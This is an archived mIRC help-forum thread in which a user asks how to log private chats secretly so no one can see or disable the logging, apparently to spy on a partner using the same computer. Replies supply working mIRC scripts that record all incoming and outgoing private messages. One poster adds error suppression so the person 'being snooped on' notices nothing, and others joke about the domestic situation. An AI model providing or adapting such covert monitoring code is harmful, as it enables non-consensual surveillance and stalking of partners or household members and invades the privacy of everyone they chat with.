mIRC Home    About    Download    Register    News    Help

Print Thread
#118777 28/04/05 10:13 PM
Joined: Mar 2005
Posts: 41
P
pUff Offline OP
Ameglian cow
OP Offline
Ameglian cow
P
Joined: Mar 2005
Posts: 41
I would like to log mIRC private chats without the log options on within the mIRC options so that no one can turn the log off or even see that there is any log on and can not be turn off by anyone.

#118778 28/04/05 10:23 PM
Joined: Dec 2002
Posts: 3,547
S
Hoopy frood
Offline
Hoopy frood
S
Joined: Dec 2002
Posts: 3,547
Code:
On *:Text:*:?: {
  write $+(logs\,$nick,.log) $date @ $time $+(<,$nick,>) $1-
}


If you are planning on releasing your script, wouldn't the audience want the choice to enable log and disable log?

#118779 28/04/05 10:50 PM
Joined: Mar 2005
Posts: 41
P
pUff Offline OP
Ameglian cow
OP Offline
Ameglian cow
P
Joined: Mar 2005
Posts: 41
I'm wanting to see what people are doing on my personal computer when i'm not around.

#118780 28/04/05 11:32 PM
Joined: Sep 2003
Posts: 4,230
D
Hoopy frood
Offline
Hoopy frood
D
Joined: Sep 2003
Posts: 4,230
on *:TEXT:*:?: { write $+("c:\,$mklogfn($nick),.txt") $date @ $time $+(<,$nick,>) $1- | :error | reseterror }
on *:INPUT:?:{ write $+("c:\,$mklogfn($target),.txt") $date @ $time $+(<,$me,>) $1- | :error | reseterror }

[edit]
just added "| :error | reseterror" so if something does go wrong the person being snooped on dont see it <evil grin>

Last edited by DaveC; 28/04/05 11:38 PM.
#118781 29/04/05 01:46 AM
Joined: Feb 2005
Posts: 194
A
Vogon poet
Offline
Vogon poet
A
Joined: Feb 2005
Posts: 194
Hey. You can lock mIRC. ALT + O. Other...Lock. This will keep people from messing with it when your away. smile


"God sometimes puts us in the dark for us to see the light"
#118782 29/04/05 01:50 AM
Joined: Dec 2002
Posts: 3,547
S
Hoopy frood
Offline
Hoopy frood
S
Joined: Dec 2002
Posts: 3,547
He wants to monitor incoming/outgoing messages. Not disable it completely..

#118783 29/04/05 02:00 AM
Joined: Feb 2005
Posts: 194
A
Vogon poet
Offline
Vogon poet
A
Joined: Feb 2005
Posts: 194
It's just an option.


"God sometimes puts us in the dark for us to see the light"
#118784 29/04/05 02:01 AM
Joined: Dec 2002
Posts: 3,547
S
Hoopy frood
Offline
Hoopy frood
S
Joined: Dec 2002
Posts: 3,547
Nah, its out the equation. :tongue:

#118785 29/04/05 05:45 AM
Joined: Sep 2003
Posts: 4,230
D
Hoopy frood
Offline
Hoopy frood
D
Joined: Sep 2003
Posts: 4,230
What ya reckon? his wifey talking to guys online?

/me rings springer for a mirc special

#118786 29/04/05 07:25 AM
Joined: Dec 2002
Posts: 3,547
S
Hoopy frood
Offline
Hoopy frood
S
Joined: Dec 2002
Posts: 3,547
* Andy goes with the flow and chants Jerry, Jerry, Jerry!

:grin

#118787 29/04/05 05:19 PM
Joined: Mar 2005
Posts: 41
P
pUff Offline OP
Ameglian cow
OP Offline
Ameglian cow
P
Joined: Mar 2005
Posts: 41
Um... something like that... I been having trubles at home and i need to keep an eye on someone so my personal info dont get out

#118788 29/04/05 11:14 PM
Joined: Sep 2003
Posts: 4,230
D
Hoopy frood
Offline
Hoopy frood
D
Joined: Sep 2003
Posts: 4,230
/me chants pUffy pUffy pUffy pUffy pUffy

And rings Judge Judy as well.

#118789 30/04/05 09:20 PM
Joined: Mar 2005
Posts: 41
P
pUff Offline OP
Ameglian cow
OP Offline
Ameglian cow
P
Joined: Mar 2005
Posts: 41
ha ha ha :P


Link Copied to Clipboard